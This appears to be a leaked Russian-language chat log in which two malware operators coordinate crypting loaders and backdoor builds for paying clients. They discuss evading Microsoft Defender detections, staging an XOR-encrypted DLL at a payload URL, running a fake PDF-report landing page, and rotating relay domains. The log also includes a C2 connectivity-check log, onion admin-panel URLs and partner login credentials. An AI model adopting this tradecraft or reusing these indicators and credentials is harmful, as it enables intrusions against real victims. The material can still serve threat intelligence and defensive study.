[30.09.21 16:04:15] manuel:		Нет. Он говрит что шелкод
[30.09.21 16:19:48] collin:		скажи как ты их криптовал, какой стаб/параметры?
[30.09.21 16:20:00] collin:		ну то есть как должно быть
[30.09.21 16:20:52] manuel:		Должно быть 
exe_shellcode_64_crypter6
dll_shellcode-rundll_64_crypter6
StartW
[30.09.21 16:58:02] collin:		Орвал вручную закриптовал, залил на COL
[30.09.21 16:58:16] collin:		можешь проверить, работоспособность?
[30.09.21 16:59:37] manuel:		Да.
[30.09.21 17:07:29] manuel:		Работают и ехе и длл
[30.09.21 17:08:48] manuel:		Сделаем стаб?
[30.09.21 17:11:00] collin:		надо кое-что будет в панели поправить
[30.09.21 17:11:23] collin:		сформулирую, завтра напишу
[01.10.21 14:46:16] manuel:		Првиет.
[01.10.21 14:46:51] manuel:		Хотел спросить по шк который вчера делал вручную
[01.10.21 14:47:15] manuel:		Ты говрил что можно добавить в билдмашину стаб
[01.10.21 14:47:21] collin:		привет!
[01.10.21 14:47:27] collin:		стабы те же остались
[01.10.21 14:47:38] collin:		поправили саму панель, теперь эти стабы доступны для любых файлов
[01.10.21 14:47:42] manuel:		Да но такой шк не определяется в билд машине как ше
[01.10.21 14:47:45] collin:		в том числе шеллкодов в таком новом формате
[01.10.21 14:48:00] collin:		не определяется, потому что у него PE-структура
[01.10.21 14:48:06] manuel:		Нашел сорри что отвлек
[01.10.21 14:48:41] collin:		может можно как-то сразу классифицировать что это шк
[01.10.21 14:48:52] collin:		но сходу тут непонятно, надо подумать будет
[01.10.21 14:49:21] manuel:		Ага. Главное что можно закриптовать
[24.10.21 14:06:01] manuel:		Привет. ЗАмечпательно!
[24.10.21 14:06:55] manuel:		Хорошо. Жду. Протестировать и завтра с утра сэм сделает крипты.
[24.10.21 14:40:30] manuel:		Получил исходники. Напомни, а как сделать в админке чтобы бот быстрее стучал и не ждал 10 минут между командами админке?
[24.10.21 14:40:40] manuel:		Если надо быстрее проверить функционал
[24.10.21 14:42:37] manuel:		ок спс
[24.10.21 15:10:12] manuel:		Скажи, а эта операция должна отработаться?
[24.10.21 15:10:26] manuel:		```
b06	no_operation	24.10.2021 14:54	pending...	nop 30 
```
[24.10.21 15:10:26] manuel:		Висит уже 10 минут в пендинг
[24.10.21 15:11:02] manuel:		а понял значит прогоняю дальше
[24.10.21 16:13:26] manuel:		Хорошо спасибо!
[24.10.21 16:13:32] manuel:		Сделаю ими тоже
[24.10.21 16:14:33] manuel:		Понятно.
[26.10.21 09:20:06] manuel:		Привет
[26.10.21 09:21:55] manuel:		По Таргету. Сильвер говрит:
[26.10.21 09:22:18] manuel:		```
быть в постоянной готовности сложно, отвлекаются силы от основных направлений
основное - прокладки, пусть их просто проверяют каждый день и восполняют
```
[26.10.21 09:23:19] manuel:		Да. Работа не пошла.
[26.10.21 09:23:27] manuel:		Надеюсь прокладки не помрут
[26.10.21 09:23:44] manuel:		Но не в пустую. Выполнили задачу Это важно
[26.10.21 09:23:52] manuel:		Нет что то на стороне  клиента
[27.10.21 14:24:11] manuel:		Привет! Нет меня там нет.
[27.10.21 14:25:20] manuel:		Отлично!
[27.10.21 14:25:30] manuel:		Это котрый мы рассматривали или что-то новое?
[27.10.21 14:26:34] manuel:		Отлично!
[27.10.21 14:26:47] manuel:		А то что тут в группе loader -это другое?
[27.10.21 14:27:35] manuel:		Красота! Тогда его для Таргета ))
[27.10.21 14:41:50] manuel:		Принял. Захожу.
[28.10.21 11:08:08] manuel:		Привет.
[28.10.21 11:08:21] manuel:		Таргет просит на завтра сборки БК. Как лучше сделать?
[28.10.21 11:15:48] manuel:		просто их криптуем с утра завтра тогда да?
[28.10.21 11:17:59] manuel:		хорошо
[29.10.21 07:18:13] manuel:		Доброе утро. Можем криптовать те сборки для Таргета, что собирали на выходных?
[29.10.21 07:21:39] manuel:		Спасибо.
[29.10.21 07:37:20] manuel:		хорошо
[29.10.21 07:43:45] manuel:		Хорошо
[29.10.21 09:17:17] manuel:		Запросил исходники. Не могу найти у себя
[29.10.21 09:17:26] manuel:		Раблота перенеслась на понедельник - вторник.
[29.10.21 09:17:30] manuel:		Сегодня снова тесты
[01.11.21 08:25:21] manuel:		привет
[01.11.21 08:25:47] manuel:		можно взять на тетсы таргетовские сбокри,
[01.11.21 08:44:14] manuel:		понял сегодня только тест.
[02.11.21 10:41:32] manuel:		Првиет
[02.11.21 10:42:04] manuel:		Ого понял.
[02.11.21 10:42:08] manuel:		Так что нужно?
[02.11.21 10:42:28] manuel:		Линк с залитой длл или как-то надо шифровать длл, которую будет запускать лоадер?
[02.11.21 10:43:39] manuel:		нет
[02.11.21 10:50:08] manuel:		Хорошо. Ему тогда выдать код и куда залита шифрованная длл?
[02.11.21 10:50:11] manuel:		Или тебе?
[02.11.21 10:55:40] manuel:		понял.
[02.11.21 11:08:47] manuel:		royal прислал 2 сборки: xor и xorv2. Какой шифровать?
[02.11.21 11:15:13] manuel:		хорошо тогда буду юзать первую версию.
[03.11.21 08:23:00] manuel:		Привет.
[03.11.21 08:23:09] manuel:		Делаем для Таргета сборку на завтра?
[03.11.21 08:26:19] manuel:		Он готовится к массированной атаке. Надо 4 как в прошлый раз. 4 исходника с прокладками на тарст доменах .com
[03.11.21 08:27:53] manuel:		если живые то можно оставить. Хотя там ханипоты какие то налетали в админку
[03.11.21 08:28:03] manuel:		Понять бы с какого адреса, засвечен он или нет
[03.11.21 09:30:43] manuel:		Да завтра с 10 работа
[03.11.21 09:30:57] manuel:		Сегодня к вечеру хотели бы закриптовать
[03.11.21 12:32:24] manuel:		Хотел спрсоить про сборку для Таргета. Как с ней дела?
[03.11.21 12:42:06] manuel:		Созрел лоадер. Заливаю на шел и пришлю линк
[03.11.21 12:43:00] manuel:		```
https://ziddat.com/file.dll
ключь xor - j
```
[03.11.21 12:43:11] manuel:		Жду лоадер для выдачи Рамону
[03.11.21 12:49:46] manuel:		regsvr32
[03.11.21 12:50:08] manuel:		Да. Длл тоже 64
[03.11.21 12:54:16] manuel:		Понял. Жду там.
[03.11.21 13:03:13] manuel:		Все получил. Криптую ехе и длл?
[03.11.21 13:04:18] manuel:		генерик не рандлл?
[03.11.21 13:05:36] manuel:		И то и то вроде. ЩАс уточню.
[03.11.21 13:05:46] manuel:		Аа ок.
[03.11.21 13:06:05] manuel:		Понял.
[03.11.21 13:06:11] manuel:		Не берем тогда его
[03.11.21 13:37:32] manuel:		Хорошо. Жду.
[03.11.21 13:37:59] manuel:		Таргет будет работать завтра весь день с утра и до ночи. Сделаем завтра с утра сборки с другимим прокладками под US?
[03.11.21 13:40:11] manuel:		15
[03.11.21 13:40:18] manuel:		Да.
[03.11.21 13:40:52] manuel:		К 15 уже выдача.
[03.11.21 13:41:08] manuel:		Криптовать будет сэм
[03.11.21 14:03:35] manuel:		```
Trojan:Win32/Wacatac.B!ml
```
[03.11.21 14:03:46] manuel:		Крипты детектят обе сборки.
[03.11.21 14:04:02] manuel:		Попробую другим стабом.
[03.11.21 14:04:06] manuel:		Криптовал 8 м
[03.11.21 14:05:16] manuel:		да.
[03.11.21 14:07:06] manuel:		Еще там в длл БК 14 группы dll
[03.11.21 14:07:11] manuel:		Будет работать?
[03.11.21 14:09:13] manuel:		В лоадере.
[03.11.21 14:09:26] manuel:		Он запускает с шела шифрованный лоадер БК
[03.11.21 14:11:09] manuel:		Понял. Попробую ручной крипт
[03.11.21 14:13:51] manuel:		В момент запуска. Через 1 секунду после запуска.
[03.11.21 14:14:14] manuel:		Машине больше 1 недели.
[03.11.21 14:14:17] manuel:		Пересоберу.
[03.11.21 14:16:21] manuel:		нет
[03.11.21 14:16:38] manuel:		отдаю тогда крипт на тест закахчику?
[03.11.21 14:18:10] manuel:		Ага. Ок отдаю.
[03.11.21 14:19:51] manuel:		Нет
[03.11.21 14:27:17] manuel:		Да у меня 2 архива. 1 от марка 1 от гиби
[03.11.21 14:35:48] manuel:		Ага. Ок.
[03.11.21 16:08:53] manuel:		Скажи, в какую админку сейчас стучит 14 группа? Которая у дерка.
[03.11.21 16:13:14] manuel:		Нет.
[03.11.21 16:14:52] manuel:		А логин пароль тот же?
[03.11.21 16:17:46] manuel:		спасибо.
[03.11.21 17:01:07] manuel:		Да. Проверяю работоспособность
[03.11.21 17:01:29] manuel:		По сборкамлоадера: марка сбокрка отработала у гибби - нет.
[03.11.21 17:01:42] manuel:		Висити и не запускает длл. Выслал ему лог разбирается.
[04.11.21 07:57:30] manuel:		Привет. Скажи, можно работать сборками Таргета? Живые прокладки?
[04.11.21 08:09:53] manuel:		Хорошо. Сделали крипты ждем Как начанется работа
[04.11.21 08:13:43] manuel:		Да.
[04.11.21 08:14:00] manuel:		Хорошо.
[04.11.21 11:05:19] manuel:		У wild
[04.11.21 11:05:37] manuel:		Если что я дам ему.
[04.11.21 12:21:54] manuel:		Хорошо! Завтра с утра с нимим тоже пойдем.
[04.11.21 12:59:16] manuel:		Понял. Значит возьмем. Занимаюсь этим вопросом.
[04.11.21 13:00:04] manuel:		Да. Ясно.
[04.11.21 13:52:54] manuel:		Скажи, можем настроить такое для Таргетовских ботов?
[04.11.21 13:53:21] manuel:		```
] <bentley> Вижу там корпы заходят. Я им делаю гет инфо 
[16:51:24] <buza> ты пойди к коллину и попроси чтобы он тебе настроил автозапуск команды 
[16:51:35] <buza> уже давно в админке есть чтобы боту автоматом выдавались команды с первого входа 
[16:51:38] <buza> не надо руками 
```
[04.11.21 13:55:26] manuel:		Пока да, то что я знаю.
[04.11.21 13:55:30] manuel:		На сейчас.
[04.11.21 13:55:56] manuel:		Да.
[04.11.21 13:58:51] manuel:		Понял. Буду делать.
[04.11.21 13:59:13] manuel:		Только старое.
[04.11.21 13:59:19] manuel:		Можешь прислать новое?
[04.11.21 14:01:41] manuel:		++
[04.11.21 15:14:47] manuel:		По еще 1 тестировщику. Сейчас тебе стукнит odis
[05.11.21 07:02:35] manuel:		Добрый день.
[05.11.21 07:02:52] manuel:		Работают прокладки для БК которые вчера выдавали Таргету?
[05.11.21 07:03:06] manuel:		odis писал вчера по тестированию?
[05.11.21 07:03:47] manuel:		Да.
[05.11.21 07:03:53] manuel:		Чтобы сегодня их в бой
[05.11.21 07:05:48] manuel:		Вчера которые
[05.11.21 07:11:48] manuel:		Хорошо! Проверяю отстук
[05.11.21 08:17:02] manuel:		Сделаем еще сборки БК для Таргета с новыми прокладками на вечер?
[05.11.21 08:17:11] manuel:		Под US
[05.11.21 08:18:17] manuel:		Да 4 так же
[05.11.21 08:18:37] manuel:		Хорошо.
[05.11.21 10:03:37] manuel:		ТАм тебе в жабу fatboy@ Не может дописаться по крипту БК
[05.11.21 10:03:41] manuel:		```
<fatboy@q3mcco35auwcstmt.onion> твоя группа будет 57 

[08:50:59] <kaktus> твоя учетка: 
[08:51:00] <kaktus> b5 
```
[05.11.21 10:11:25] manuel:		Ok
[05.11.21 10:11:28] manuel:		Спс
[05.11.21 10:31:34] manuel:		Детектит БК бот у Таргета.
[05.11.21 10:31:45] manuel:		```
Behavior:Win32/DefenseEvasion.A!ml
file: C:\Users\T1\AppData\Local\Temp\xb0mkctr.dll
```
[05.11.21 10:31:52] manuel:		После того как отработал лоаедр.
[05.11.21 10:32:44] manuel:		Проверял на чистой вм, поставленной сегодня с чистым айпи
[05.11.21 10:32:59] manuel:		http://194.36.110.217/
[05.11.21 10:33:18] manuel:		С полностью включенным облаком - требование заказчика.
[05.11.21 10:34:31] manuel:		Через лоадер на ленде.
[05.11.21 10:34:55] manuel:		```
https://pdf-report-view.azurewebsites.net/report.html
```
[05.11.21 10:35:10] manuel:		Сборка сложно сказать, там рандомится из 4 сборок.
[05.11.21 10:35:24] manuel:		Крипт сегодня делал зарезервированным стабом на билд машине.
[05.11.21 10:36:22] manuel:		Вчера да от него. Но сегодня они начали детектить на запуск. Ушел на чистку. Сдела крипты с билд машины.
[05.11.21 10:36:43] manuel:		Даже вернее они начали детектить вчера вером когда US грузили.
[05.11.21 10:37:02] manuel:		Да. После запуска лоадера БК и работы его примерно 10 минут
[05.11.21 10:38:56] manuel:		Хотя вот бот стучит
[05.11.21 10:39:04] manuel:		Bot 1682227458877006460716293019326164893668
[05.11.21 10:39:11] manuel:		Значит это детект на лоадер?
[05.11.21 10:39:53] manuel:		Забрал на карантин
[05.11.21 10:40:14] manuel:		```
Behavior:Win32/DefenseEvasion.A!ml
```
[05.11.21 10:40:26] manuel:		```
regkey: HKCU@S-1-5-21-3330311154-4225037360-3303937722-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\\tishmjnhioanlnokantlrwudm
```
[05.11.21 10:40:37] manuel:		```
runkey: HKCU@S-1-5-21-3330311154-4225037360-3303937722-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\\tishmjnhioanlnokantlrwudm
```
[05.11.21 10:44:03] manuel:		```
Microsoft Defender Antivirus has detected malware or other potentially unwanted software.
 For more information please see the following:
https://go.microsoft.com/fwlink/?linkid=37020&name=Behavior:Win32/DefenseEvasion.A!ml&threatid=2147738096&enterprise=0
 	Name: Behavior:Win32/DefenseEvasion.A!ml
 	ID: 2147738096
 	Severity: Severe
 	Category: Suspicious Behavior
 	Path: file:_C:\Users\T1\AppData\Local\Temp\xb0mkctr.dll
 	Detection Origin: Local machine
 	Detection Type: FastPath
 	Detection Source: Real-Time Protection
 	User: TST2\T1
 	Process Name: C:\Windows\explorer.exe
 	Security intelligence Version: AV: 1.353.464.0, AS: 1.353.464.0, NIS: 1.353.464.0
 	Engine Version: AM: 1.1.18700.4, NIS: 1.1.18700.4
```
[05.11.21 10:44:36] manuel:		```
Microsoft Defender Antivirus has detected malware or other potentially unwanted software.
 For more information please see the following:
https://go.microsoft.com/fwlink/?linkid=37020&name=Behavior:Win32/DefenseEvasion.A!ml&threatid=2147738096&enterprise=0
 	Name: Behavior:Win32/DefenseEvasion.A!ml
 	ID: 2147738096
 	Severity: Severe
 	Category: Suspicious Behavior
 	Path: file:_C:\Users\T1\AppData\Local\Temp\xb0mkctr.dll; regkey:_HKCU@S-1-5-21-3330311154-4225037360-3303937722-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\\tishmjnhioanlnokantlrwudm; runkey:_HKCU@S-1-5-21-3330311154-4225037360-3303937722-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\\tishmjnhioanlnokantlrwudm
 	Detection Origin: Local machine
 	Detection Type: FastPath
 	Detection Source: Real-Time Protection
 	User: TST2\T1
 	Process Name: C:\Windows\explorer.exe
 	Security intelligence Version: AV: 1.353.464.0, AS: 1.353.464.0, NIS: 1.353.464.0
 	Engine Version: AM: 1.1.18700.4, NIS: 1.1.18700.4
```
[05.11.21 10:45:59] manuel:		```
dl_v03_regsvr32_85104_1.dll
l_dll02l_85103_2.dll
l_dllv04_85102_9.dll
```
[05.11.21 10:46:06] manuel:		Вот на них детект
[05.11.21 14:19:53] manuel:		ДА попробовал Лругие сбокри пока не детектятся
[05.11.21 16:28:40] manuel:		Можно проверить адреса на которые делали вчера сборку? Плохо стучат очень.
[05.11.21 16:36:40] manuel:		+
[05.11.21 16:37:37] manuel:		у меня на тестовой уже полчаса не стучит в админку
[05.11.21 16:38:29] manuel:		ясно
[05.11.21 16:38:40] manuel:		получается тогда не с com адреса идет да?
[05.11.21 16:39:32] manuel:		боты есть онлайн и немного новых пришло
[05.11.21 16:40:07] manuel:		понял
[08.11.21 10:30:48] manuel:		Дорбрый день.
[08.11.21 10:31:12] manuel:		Хочу спросить адреса сборки для Таргета, которые собирали в пятницу. Они рабочие?
[08.11.21 11:07:24] manuel:		Спасибо ок.
[09.11.21 07:34:05] manuel:		Првиет.
[09.11.21 07:34:22] manuel:		В Админке Таргета все боты в офе.
[09.11.21 07:34:32] manuel:		И вчера вечером очень плохо стучали.
[09.11.21 07:34:44] manuel:		Запускал на виртуалке. 1 стучала вторая нет.
[09.11.21 07:35:12] manuel:		Как нам решить эту проблему?
[09.11.21 07:35:44] manuel:		С теряющимся отстуком. Когда готовим на тестах все стучит без проблем. Начинаем работу и все лежит.
[09.11.21 07:37:48] manuel:		Последние да.
[09.11.21 07:38:40] manuel:		И сегодня нужны новые к 14
[09.11.21 07:39:01] manuel:		Да.
[09.11.21 08:31:07] manuel:		Понял жду сборки.
[09.11.21 09:14:55] manuel:		Хорошо.
[09.11.21 12:50:16] manuel:		Отлично!
[09.11.21 13:50:45] manuel:		отлично!
[09.11.21 13:51:18] manuel:		а можно мне самому в процессе работы как-то проверять работоспособность пиокладок?
[09.11.21 13:52:06] manuel:		хорошо. а то вчера сели в лужу и не понятно где стопор
[09.11.21 13:58:00] manuel:		Так а список адресов беру у кодеров?
[09.11.21 14:00:13] manuel:		ок
[09.11.21 15:15:34] manuel:		Нет что-то он затих. Спрошу, как увижу.
[12.11.21 13:18:33] manuel:		Првиет.
[12.11.21 13:18:48] manuel:		НАм на понедельник на уро нужны рабочие чборки БК для Таргета.
[12.11.21 13:19:03] manuel:		Можно использовать то что последнее делали?
[12.11.21 13:29:28] manuel:		Как быть?
[12.11.21 13:33:23] manuel:		Нет в работу не пускали
[12.11.21 14:08:43] manuel:		Хорошо. Жду.
[12.11.21 15:09:44] manuel:		Хорошо
[15.11.21 08:53:58] manuel:		Привет.
[15.11.21 08:54:13] manuel:		Проверил сейчас тестером адреса. 7 адресов в офе.
[15.11.21 08:54:20] manuel:		Надо переделывать сборки?
[15.11.21 08:54:24] manuel:		Для Таргета
[15.11.21 08:55:15] manuel:		```
C:\Users\T1\Downloads\g>bdchkT amanaraba.com jraty-mion.com baramanamc.com candabare.com cnriyou.com damnrtyu.com eartymanacaty.com ijartymart.com kloi-area.com korata-di.com korty-bav.com marcanaty.com marty-klia.com porty-kala.com varklo.com
[=] BD general address checked build Oct  6 2021 14:36:03 started
[+] Backdoor ID generated: 0086451867043661447925562419231865605798
[+] Step 1: import 15 servers
[=] Try connect to server. Domain: amanaraba.com, port: 443, prefix: /australia/addrtest1/tst0421
[+] Received response status code: 200
[=] Received command: 0 60
[+] amanaraba.com - OK!
[=] Try connect to server. Domain: jraty-mion.com, port: 443, prefix: /australia/addrtest1/tst0421
[+] Received response status code: 200
[=] Received command: 0 60
[+] jraty-mion.com - OK!
[=] Try connect to server. Domain: baramanamc.com, port: 443, prefix: /australia/addrtest1/tst0421
[-] Error call WinHttpSendRequest, code 12007
[-] Error sending http request (get next command)
[-] baramanamc.com - Error!
[=] Try connect to server. Domain: candabare.com, port: 443, prefix: /australia/addrtest1/tst0421
[-] Error call WinHttpSendRequest, code 12007
[-] Error sending http request (get next command)
[-] candabare.com - Error!
[=] Try connect to server. Domain: cnriyou.com, port: 443, prefix: /australia/addrtest1/tst0421
[-] Error call WinHttpSendRequest, code 12007
[-] Error sending http request (get next command)
[-] cnriyou.com - Error!
[=] Try connect to server. Domain: damnrtyu.com, port: 443, prefix: /australia/addrtest1/tst0421
[-] Error call WinHttpSendRequest, code 12007
[-] Error sending http request (get next command)
[-] damnrtyu.com - Error!
[=] Try connect to server. Domain: eartymanacaty.com, port: 443, prefix: /australia/addrtest1/tst0421
[-] Error call WinHttpSendRequest, code 12007
[-] Error sending http request (get next command)
[-] eartymanacaty.com - Error!
[=] Try connect to server. Domain: ijartymart.com, port: 443, prefix: /australia/addrtest1/tst0421
[+] Received response status code: 200
[=] Received command: 0 60
[+] ijartymart.com - OK!
[=] Try connect to server. Domain: kloi-area.com, port: 443, prefix: /australia/addrtest1/tst0421
[-] Error call WinHttpSendRequest, code 12007
[-] Error sending http request (get next command)
[-] kloi-area.com - Error!
[=] Try connect to server. Domain: korata-di.com, port: 443, prefix: /australia/addrtest1/tst0421
[+] Received response status code: 200
[=] Received command: 0 60
[+] korata-di.com - OK!
[=] Try connect to server. Domain: korty-bav.com, port: 443, prefix: /australia/addrtest1/tst0421
[-] Error call WinHttpSendRequest, code 12007
[-] Error sending http request (get next command)
[-] korty-bav.com - Error!
[=] Try connect to server. Domain: marcanaty.com, port: 443, prefix: /australia/addrtest1/tst0421
[+] Received response status code: 200
[=] Received command: 0 60
[+] marcanaty.com - OK!
[=] Try connect to server. Domain: marty-klia.com, port: 443, prefix: /australia/addrtest1/tst0421
[-] Error call WinHttpSendRequest, code 12007
[-] Error sending http request (get next command)
[-] marty-klia.com - Error!
[=] Try connect to server. Domain: porty-kala.com, port: 443, prefix: /australia/addrtest1/tst0421
[+] Received response status code: 200
[=] Received command: 0 60
[+] porty-kala.com - OK!
[=] Try connect to server. Domain: varklo.com, port: 443, prefix: /australia/addrtest1/tst0421
[+] Received response status code: 200
[=] Received command: 0 60
[+] varklo.com - OK!
```
[15.11.21 08:55:35] manuel:		Вот у меня лог такой
[15.11.21 08:57:08] manuel:		хм... прошу прощения тогда нет не давал значит или я что то не сохранил
[15.11.21 08:57:40] manuel:		по 2 на сборку да?
[15.11.21 08:58:48] manuel:		аа понял.
[15.11.21 09:00:12] manuel:		Можно пока эти в бой пустить. До скольки можно заказывать новые сборки?
[15.11.21 09:01:35] manuel:		Понял.
[16.11.21 13:56:25] manuel:		хорошо сброшу.
[16.11.21 13:56:45] manuel:		По дням или общей суммой?
[16.11.21 13:58:15] manuel:		В течении ча а пришлю
[16.11.21 15:09:06] manuel:		Сделал
[16.11.21 15:09:20] manuel:		Пришли, пожалуйста, свой паблик ключ
[16.11.21 15:09:24] manuel:		Не могу найти у себя
[16.11.21 15:09:45] manuel:		```
-----BEGIN PGP PUBLIC KEY BLOCK-----
Comment: Идентификатор пользователя:	Manul <manul@aol.com>
Comment: Дата создания:	05.07.2021 20:05
Comment: Действителен до:	05.07.2023 12:00
Comment: Тип:	3 072-битный RSA (доступен секретный ключ)
Comment: Применение:	Подпись, Шифрование, Заверение идентификаторов пользователя
Comment: Отпечаток:	D70337F7118DC37ED738E4FBDF9BF79B569D6301


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
/T15MT2ej+aHw+X6PQ==
=/9tN
-----END PGP PUBLIC KEY BLOCK-----
```
[16.11.21 15:09:47] manuel:		Вот мой
[16.11.21 15:25:43] manuel:		```
https://privatlab.com/s/v/aqOqalOa67fRWVEynVEk
```
[16.11.21 15:28:30] manuel:		Пожалуйста.
[24.11.21 07:53:14] manuel:		Доброе утро.
[24.11.21 07:53:31] manuel:		Скажи, пожалуйста, у нас жеесть былды 32 битные лоедар и бота БК?
[24.11.21 07:55:28] manuel:		почему?
[24.11.21 07:56:45] manuel:		Понял
[25.11.21 07:48:55] manuel:		Привет.
[25.11.21 07:49:25] manuel:		Франсис попросил сделать новю сборку БК для sentinel@
[25.11.21 07:49:45] manuel:		Ему нужна новая группа и длл с любой точкой.
[25.11.21 07:54:26] collin:		привет!
[25.11.21 07:54:42] collin:		новую учетку?
[25.11.21 07:55:42] manuel:		Да все новое. Группу и учетку
[25.11.21 07:56:29] collin:		учетку как передать, через тебя?
[25.11.21 07:56:51] collin:		и сборку как выдавать
[25.11.21 07:57:23] manuel:		Как тебе будет удобнее. Можно через меня.
[25.11.21 07:58:31] collin:		готовим сборку, крипт выдаем его тебе?
[25.11.21 07:59:16] manuel:		Да давай я тогда все передам
[25.11.21 07:59:33] collin:		не в курсе SAM криптует у нас?
[25.11.21 07:59:48] collin:		давно криптов не делал
[25.11.21 07:59:50] manuel:		Да.
[25.11.21 08:00:02] manuel:		Вчера наяал делать. Болел.
[25.11.21 10:07:47] collin:		учетка для партнера:
[25.11.21 10:07:49] collin:		```
b8
k4Nd9lTJ&k4nk6Ndk7D
```
[25.11.21 10:08:00] collin:		админка:
[25.11.21 10:08:05] collin:		```
https://x6rciduomtjt25xigz7onkgxmusuwwuxqvidjkcramwg3lb5vvpsm7ad.onion/dAkEAkFKkzm8QTA3vk1zyS50ArYk8y4le4HtJ6UaWHtus/
```
[25.11.21 10:08:10] collin:		будет группа 17
[25.11.21 10:08:15] collin:		крипт выдаст wild
[25.11.21 10:08:54] manuel:		Хорошо. Спасибо!
[25.11.21 10:10:23] collin:		функция-точка входа в крипте будет: ClearResource
[25.11.21 10:11:51] manuel:		Хорошо
[13.12.21 17:11:08] manuel:		Добрый вечер.
[13.12.21 17:11:17] manuel:		У клиента вопрос по рантайму БК в ехе формате.
[13.12.21 17:11:22] manuel:		Можем показать?
[13.12.21 17:41:07] collin:		привет!
[13.12.21 17:41:14] collin:		какой вопрос?
[13.12.21 17:41:51] manuel:		Просит сделать рантайм тест на динчеке
[13.12.21 17:42:00] manuel:		ехе файла
[13.12.21 17:42:16] collin:		БК?
[13.12.21 17:42:22] collin:		крипта или исходника, какая группа?
[13.12.21 17:42:52] manuel:		Крипта. та что для netwalker@ была
[13.12.21 17:43:10] collin:		мы для него не делали давно
[13.12.21 17:43:20] manuel:		Ага.
[13.12.21 17:43:29] collin:		новая сборка нужна, или какая?
[13.12.21 17:43:37] manuel:		Новая да
[13.12.21 17:49:55] collin:		делаю новую сборку, готовим криптуем и тебе выдаем крипт?
[13.12.21 17:50:03] collin:		или самим проверить, тебе только отчет на динчеке
[13.12.21 17:50:24] collin:		завтра постараемся собратьб
[13.12.21 17:50:29] manuel:		Да давай мне крипт я чекну на динчеке
[13.12.21 17:50:39] manuel:		Хорошо завтра
[14.12.21 08:14:59] collin:		Привет!
[14.12.21 08:15:04] collin:		заказал сборку, группа 29
[14.12.21 08:15:06] collin:		крипт выдаст wild
